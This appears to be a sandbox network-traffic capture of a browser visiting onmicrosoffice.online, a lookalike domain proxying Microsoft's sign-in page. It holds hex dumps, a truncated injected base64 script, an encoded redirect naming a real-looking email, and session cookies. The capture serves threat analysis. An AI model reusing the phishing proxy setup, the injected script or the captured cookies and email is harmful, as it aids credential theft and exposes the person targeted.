2024-04-24 13:24:43 UTC	1380	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32 4e 31 62 57 56 75 64 43 35 6f 5a 57 46 6b 4c 6d 46 77 63 47 56 75 5a 45 4e 6f 61 57 78 6b 4b 45 39 69 61 6d 56 6a 64 43 35 68 63 33 4e 70 5a 32 34 6f 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 33 4a 6c 59 58 52 6c 52 57 78 6c 62 57 56 75 64 43 67 69 5a 47 6c 32 49 69 6b 73 65 Data Ascii: <html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49775	89.116.187.236	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:43 UTC	1947	OUT	GET /?i4pz914tl=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0OTU2MTg4Mjk1NzE5NTQuNzRjOGVhMDgtNWI4Zi00YWM1LWIxZTctYzIxMjIwNjAzN2JmJnN0YXRlPURZdEJDc01nRUFDMWVVc3ZCWTBhMTEwUHBVOHBxNWcya0NqWVFMOGZZV1p1STRVUTBfQTJsR1pFWUZqSVJ3aVd5RVZBRzhGcjlKa0tHMUtRYUZXZU02aGtDNnJzckhNbW1BWFRLc2Y3bU51ZjU5ZmVQbHQ5ZjdkNlBoUDNBZXRlNnJtWGZ2ZW10NV9PN2JnQQ== HTTP/1.1 Host: onmicrosoffice.online Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=W0H4QtKQv7br; qPdM.sig=U-Oy8SNmt-6MqabUMMHPOKH0nXY; ClientId=A794BA8C4B654B43ACDC7267ACAB95AC; OIDC=1; OpenIdConnect.nonce.v3.PKuzfwUTEvLItbobcOVAyzWnTNk46nlUCuz9anBslxY=638495618829571954.74c8ea08-5b8f-4ac5-b1e7-c212206037bf; X-OWA-RedirectHistory=ArLym14Bctf65mFk3Ag
2024-04-24 13:24:44 UTC	2035	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Strict-Transport-Security: max-age=31536000; includeSubDomains P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: 5bffe770-1253-4eb2-a20b-0cd7a5eec800 x-ms-ests-server: 2.1.17846.6 - EUS ProdSlices nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: esctx-yMbl01kPIpQ=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd851iqwTKcGtxOB7U7qoaXs9uh7LORIq6gTHyjKudzTC1CM19nIJXPrKFdQ4fkePJqr3gTVODApOxjtqnZftvgfLn5hLz4nBuNcv_3fTypvkZ8dFI4BL6wEcN2n5GYLOdG_8OuJ-90s0wVyqGG5Kbh8CAA; domain=onmicrosoffice.online; path=/; secure; HttpOnly; SameSite=None Set-Cookie: fpc=AvaH28Aio81MiaUB3bZI-Zw; expires=Fri, 24-May-2024 13:24:44 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8nV2pomA_lu1HEyz2Yh2a2abAjmlN7beaCAcudLYUmBxiRPThwuqOShgJIWDsK4j9vaRXLOWMCw7UBceW2sQUClzV4gKP4eqzQ76hLVD213_uewjjAfJC4QFwms6pWnb33QpGKgdnTPaVwqiCEVHhbQY3t8AFgQwAHQK8DWN78LcgAA; domain=onmicrosoffice.online; path=/; secure; HttpOnly; SameSite=None Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Set-Cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly Date: Wed, 24 Apr 2024 13:24:43 GMT Connection: close content-length: 21101 Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2024-04-24 13:24:44 UTC	14349	IN	Data Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32 Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2
2024-04-24 13:24:44 UTC	6752	IN	Data Raw: 3a 20 4c 6f 61 64 65 64 22 2c 65 29 3b 76 61 72 20 64 3d 6e 65 77 20 63 0a 3b 64 2e 66 61 69 6c 4d 65 73 73 61 67 65 3d 22 52 65 6c 6f 61 64 20 46 61 69 6c 65 64 22 2c 64 2e 73 75 63 63 65 73 73 4d 65 73 73 61 67 65 3d 22 52 65 6c 6f 61 64 20 53 75 63 63 65 73 73 22 2c 64 2e 4c 6f 61 64 28 6e 75 6c 6c 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6f 29 7b 74 68 72 6f 77 22 55 6e 65 78 70 65 63 74 65 64 20 73 74 61 74 65 2e 20 52 65 73 6f 75 72 63 65 4c 6f 61 64 65 72 2e 4c 6f 61 64 28 29 20 66 61 69 6c 65 64 20 64 65 73 70 69 74 65 20 69 6e 69 74 69 61 6c 20 6c 6f 61 64 20 73 75 63 63 65 73 73 2e 20 5b 27 22 2b 6e 2b 22 27 5d 22 7d 73 26 26 28 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 65 72 72 6f 72 2e 61 73 70 78 3f 65 72 Data Ascii: : Loaded",e);var d=new c;d.failMessage="Reload Failed",d.successMessage="Reload Success",d.Load(null,function(){if(o){throw"Unexpected state. ResourceLoader.Load() failed despite initial load success. ['"+n+"']"}s&&(document.location.href="/error.aspx?er

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49776	89.116.187.236	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:44 UTC	2350	OUT	GET /aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_ChpboAn7HyXj89A22M8mzg2.js HTTP/1.1 Host: onmicrosoffice.online Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://onmicrosoffice.online/?i4pz914tl=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0OTU2MTg4Mjk1NzE5NTQuNzRjOGVhMDgtNWI4Zi00YWM1LWIxZTctYzIxMjIwNjAzN2JmJnN0YXRlPURZdEJDc01nRUFDMWVVc3ZCWTBhMTEwUHBVOHBxNWcya0NqWVFMOGZZV1p1STRVUTBfQTJsR1pFWUZqSVJ3aVd5RVZBRzhGcjlKa0tHMUtRYUZXZU02aGtDNnJzckhNbW1BWFRLc2Y3bU51ZjU5ZmVQbHQ5ZjdkNlBoUDNBZXRlNnJtWGZ2ZW10NV9PN2JnQQ== Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=W0H4QtKQv7br; qPdM.sig=U-Oy8SNmt-6MqabUMMHPOKH0nXY; ClientId=A794BA8C4B654B43ACDC7267ACAB95AC; OIDC=1; OpenIdConnect.nonce.v3.PKuzfwUTEvLItbobcOVAyzWnTNk46nlUCuz9anBslxY=638495618829571954.74c8ea08-5b8f-4ac5-b1e7-c212206037bf; X-OWA-RedirectHistory=ArLym14Bctf65mFk3Ag; esctx-yMbl01kPIpQ=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd851iqwTKcGtxOB7U7qoaXs9uh7LORIq6gTHyjKudzTC1CM19nIJXPrKFdQ4fkePJqr3gTVODApOxjtqnZftvgfLn5hLz4nBuNcv_3fTypvkZ8dFI4BL6wEcN2n5GYLOdG_8OuJ-90s0wVyqGG5Kbh8CAA; fpc=AvaH28Aio81MiaUB3bZI-Zw; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8nV2pomA_lu1HEyz2Yh2a2abAjmlN7beaCAcudLYUmBxiRPThwuqOShgJIWDsK4j9vaRXLOWMCw7UBceW2sQUClzV4gKP4eqzQ76hLVD213_uewjjAfJC4QFwms6pWnb33QpGKgdnTPaVwqiCEVHhbQY3t8AFgQwAHQK8DWN78LcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
2024-04-24 13:24:45 UTC	1343	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 2262887 Cache-Control: public, max-age=31536000 Content-MD5: 2vlVvyES905PeLIYeo1r7w== Content-Type: application/x-javascript Date: Wed, 24 Apr 2024 13:24:45 GMT Etag: 0x8DC4DBF5E20DC85 Last-Modified: Tue, 26 Mar 2024 18:05:49 GMT Server: ECAcc (laa/7B41) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: e3c3061c-c01e-00ff-63b6-81766c000000 x-ms-version: 2009-09-19 content-length: 141349 Connection: close Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2024-04-24 13:24:45 UTC	15041	IN	Data Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61 Data Ascii: /! ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
2024-04-24 13:24:45 UTC	16384	IN	Data Raw: 70 61 6e 22 29 3b 65 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 4c 65 66 74 43 6f 6c 6f 72 3d 22 72 65 64 22 2c 65 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 69 67 68 74 43 6f 6c 6f 72 3d 22 62 6c 75 65 22 2c 65 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 65 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 2d 39 39 39 70 78 22 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 3b 76 61 72 20 6e 3d 5f 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 29 3b 45 3d 6e 2e 62 6f 72 64 65 72 4c 65 66 74 43 6f 6c 6f 72 3d 3d 3d 6e 2e 62 6f 72 64 65 72 52 69 67 68 74 43 6f 6c 6f 72 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 7d 72 65 74 75 72 6e 20 45 7d 2c 67 Data Ascii: pan");e.style.borderLeftColor="red",e.style.borderRightColor="blue",e.style.position="absolute",e.style.top="-999px",document.body.appendChild(e);var n=_.getComputedStyle(e);E=n.borderLeftColor===n.borderRightColor,document.body.removeChild(e)}return E},g
2024-04-24 13:24:45 UTC	16384	IN	Data Raw: 54 69 6d 65 64 4f 75 74 3a 31 30 32 39 2c 53 65 6e 64 4e 6f 74 69 66 69 63 61 74 69 6f 6e 46 61 69 6c 65 64 3a 31 30 33 30 2c 53 65 72 76 65 72 5f 4d 65 73 73 61 67 65 4f 6e 6c 79 3a 39 39 39 39 2c 50 50 5f 45 5f 44 42 5f 4d 45 4d 42 45 52 44 4f 45 53 4e 4f 54 45 58 49 53 54 3a 22 43 46 46 46 46 43 31 35 22 2c 50 50 5f 45 5f 45 58 43 4c 55 44 45 44 3a 22 38 30 30 34 31 30 31 30 22 2c 50 50 5f 45 5f 4d 45 4d 42 45 52 5f 4c 4f 43 4b 45 44 3a 22 38 30 30 34 31 30 31 31 22 2c 50 50 5f 45 5f 42 41 44 5f 50 41 53 53 57 4f 52 44 3a 22 38 30 30 34 31 30 31 32 22 2c 50 50 5f 45 5f 4d 49 53 53 49 4e 47 5f 4d 45 4d 42 45 52 4e 41 4d 45 3a 22 38 30 30 34 31 30 33 31 22 2c 50 50 5f 45 5f 4d 49 53 53 49 4e 47 5f 50 41 53 53 57 4f 52 44 3a 22 38 30 30 34 31 30 33 32 22 Data Ascii: TimedOut:1029,SendNotificationFailed:1030,Server_MessageOnly:9999,PP_E_DB_MEMBERDOESNOTEXIST:"CFFFFC15",PP_E_EXCLUDED:"80041010",PP_E_MEMBER_LOCKED:"80041011",PP_E_BAD_PASSWORD:"80041012",PP_E_MISSING_MEMBERNAME:"80041031",PP_E_MISSING_PASSWORD:"80041032"
2024-04-24 13:24:45 UTC	16384	IN	Data Raw: 5d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 6e 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 6e 2c 74 2c 72 29 7b 76 61 72 20 6f 3d 65 5b 6e 5d 2e 6d 61 74 63 68 28 62 29 7c 7c 5b 5d 3b 53 2e 61 2e 44 28 74 2e 6d 61 74 63 68 28 62 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 53 2e 61 2e 4e 61 28 6f 2c 65 2c 72 29 7d 29 29 2c 65 5b 6e 5d 3d 6f 2e 6a 6f 69 6e 28 22 20 22 29 7d 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 69 3d 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 5b 5d 7d 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 2c 66 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 Data Ascii: ]);return e}function t(e,n){return e.__proto__=n,e}function r(e,n,t,r){var o=e[n].match(b)\|\|[];S.a.D(t.match(b),(function(e){S.a.Na(o,e,r)})),e[n]=o.join(" ")}var o=Object.prototype.hasOwnProperty,i={__proto__:[]}instanceof Array,f="function"==typeof Symb
2024-04-24 13:24:45 UTC	16384	IN	Data Raw: 3b 72 65 74 75 72 6e 7b 78 63 3a 65 2c 65 6e 64 3a 6e 2c 63 63 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 74 29 7b 69 66 28 21 53 2e 51 63 28 65 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 4f 6e 6c 79 20 73 75 62 73 63 72 69 62 61 62 6c 65 20 74 68 69 6e 67 73 20 63 61 6e 20 61 63 74 20 61 73 20 64 65 70 65 6e 64 65 6e 63 69 65 73 22 29 3b 74 2e 6f 64 2e 63 61 6c 6c 28 74 2e 70 64 2c 65 2c 65 2e 66 64 7c 7c 28 65 2e 66 64 3d 2b 2b 6f 29 29 7d 7d 2c 47 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6f 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 65 28 29 2c 74 2e 61 70 70 6c 79 28 72 2c 6f 7c 7c 5b 5d 29 7d 66 69 6e 61 6c 6c 79 7b 6e 28 29 7d 7d 2c 71 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 29 72 65 74 75 72 6e 20 74 2e 6f 2e 71 61 28 29 7d 2c 56 61 Data Ascii: ;return{xc:e,end:n,cc:function(e){if(t){if(!S.Qc(e))throw Error("Only subscribable things can act as dependencies");t.od.call(t.pd,e,e.fd\|\|(e.fd=++o))}},G:function(t,r,o){try{return e(),t.apply(r,o\|\|[])}finally{n()}},qa:function(){if(t)return t.o.qa()},Va
2024-04-24 13:24:45 UTC	16384	IN	Data Raw: 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 53 2e 6a 2e 74 63 28 74 2c 65 2c 6e 2c 21 30 29 7d 2c 67 65 74 42 69 6e 64 69 6e 67 73 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 54 79 70 65 29 7b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 62 69 6e 64 22 29 3b 63 61 73 65 20 38 3a 72 65 74 75 72 6e 20 53 2e 68 2e 56 64 28 65 29 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 2c 70 61 72 73 65 42 69 6e 64 69 6e 67 73 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 2c 72 29 7b 74 72 79 7b 76 61 72 20 6f 2c 69 3d 74 68 69 73 2e 6e 64 2c 61 3d 65 2b 28 72 26 26 72 2e 76 61 6c 75 65 41 63 63 65 73 73 6f 72 73 7c 7c 22 22 Data Ascii: ):null;return S.j.tc(t,e,n,!0)},getBindingsString:function(e){switch(e.nodeType){case 1:return e.getAttribute("data-bind");case 8:return S.h.Vd(e);default:return null}},parseBindingsString:function(e,n,t,r){try{var o,i=this.nd,a=e+(r&&r.valueAccessors\|\|""
2024-04-24 13:24:45 UTC	16384	IN	Data Raw: 20 65 2e 73 65 6c 65 63 74 65 64 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 6e 2c 74 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 6e 3b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 72 3f 6e 28 65 29 3a 22 73 74 72 69 6e 67 22 3d 3d 72 3f 65 5b 6e 5d 3a 74 7d 66 75 6e 63 74 69 6f 6e 20 69 28 6e 2c 74 29 7b 69 66 28 68 26 26 6c 29 53 2e 69 2e 6d 61 28 65 2c 53 2e 69 2e 48 29 3b 65 6c 73 65 20 69 66 28 70 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 72 3d 30 3c 3d 53 2e 61 2e 41 28 70 2c 53 2e 77 2e 4d 28 74 5b 30 5d 29 29 3b 53 2e 61 2e 5a 63 28 74 5b 30 5d 2c 72 29 2c 68 26 26 21 72 26 26 53 2e 75 2e 47 28 53 2e 61 2e 46 62 2c 6e 75 6c 6c 2c 5b 65 2c 22 63 68 61 6e 67 65 22 5d 29 7d 7d 76 61 72 20 73 3d 65 2e 6d 75 6c 74 69 70 6c 65 2c 75 3d 30 Data Ascii: e.selected}))}function o(e,n,t){var r=typeof n;return"function"==r?n(e):"string"==r?e[n]:t}function i(n,t){if(h&&l)S.i.ma(e,S.i.H);else if(p.length){var r=0<=S.a.A(p,S.w.M(t[0]));S.a.Zc(t[0],r),h&&!r&&S.u.G(S.a.Fb,null,[e,"change"])}}var s=e.multiple,u=0
2024-04-24 13:24:45 UTC	16384	IN	Data Raw: 74 69 6f 6e 28 29 7b 69 66 28 21 6c 7c 7c 21 6c 2e 74 6d 70 6c 29 72 65 74 75 72 6e 20 30 3b 74 72 79 7b 69 66 28 30 3c 3d 6c 2e 74 6d 70 6c 2e 74 61 67 2e 74 6d 70 6c 2e 6f 70 65 6e 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 64 65 78 4f 66 28 22 5f 5f 22 29 29 72 65 74 75 72 6e 20 32 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 31 7d 28 29 3b 74 68 69 73 2e 72 65 6e 64 65 72 54 65 6d 70 6c 61 74 65 53 6f 75 72 63 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 2c 6f 29 7b 69 66 28 6f 3d 6f 7c 7c 75 2c 72 3d 72 7c 7c 7b 7d 2c 32 3e 65 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 59 6f 75 72 20 76 65 72 73 69 6f 6e 20 6f 66 20 6a 51 75 65 72 79 2e 74 6d 70 6c 20 69 73 20 74 6f 6f 20 6f 6c 64 2e 20 50 6c 65 61 73 65 20 75 70 67 72 61 64 65 20 74 6f 20 Data Ascii: tion(){if(!l\|\|!l.tmpl)return 0;try{if(0<=l.tmpl.tag.tmpl.open.toString().indexOf("__"))return 2}catch(e){}return 1}();this.renderTemplateSource=function(n,t,r,o){if(o=o\|\|u,r=r\|\|{},2>e)throw Error("Your version of jQuery.tmpl is too old. Please upgrade to
2024-04-24 13:24:45 UTC	11620	IN	Data Raw: 53 53 4f 20 49 6e 69 74 69 61 6c 69 7a 65 64 22 29 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 72 3d 74 28 33 29 2c 6f 3d 74 28 32 31 29 2c 69 3d 74 28 37 29 2c 61 3d 74 28 30 29 2c 73 3d 74 28 31 29 2c 75 3d 74 28 39 29 2e 67 65 74 49 6e 73 74 61 6e 63 65 28 77 69 6e 64 6f 77 2e 53 65 72 76 65 72 44 61 74 61 29 2c 63 3d 74 28 35 29 2c 6c 3d 77 69 6e 64 6f 77 2c 64 3d 6c 2e 24 43 6f 6e 66 69 67 7c 7c 6c 2e 53 65 72 76 65 72 44 61 74 61 7c 7c 7b 7d 2c 66 3d 61 2e 4f 62 6a 65 63 74 2c 70 3d 73 2e 51 75 65 72 79 53 74 72 69 6e 67 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 2c 74 3d 21 31 21 3d 3d 28 65 3d 65 7c 7c 7b 7d 29 2e 63 68 65 63 6b 41 70 69 43 61 6e 61 72 79 2c 61 3d Data Ascii: SSO Initialized"))}},function(e,n,t){var 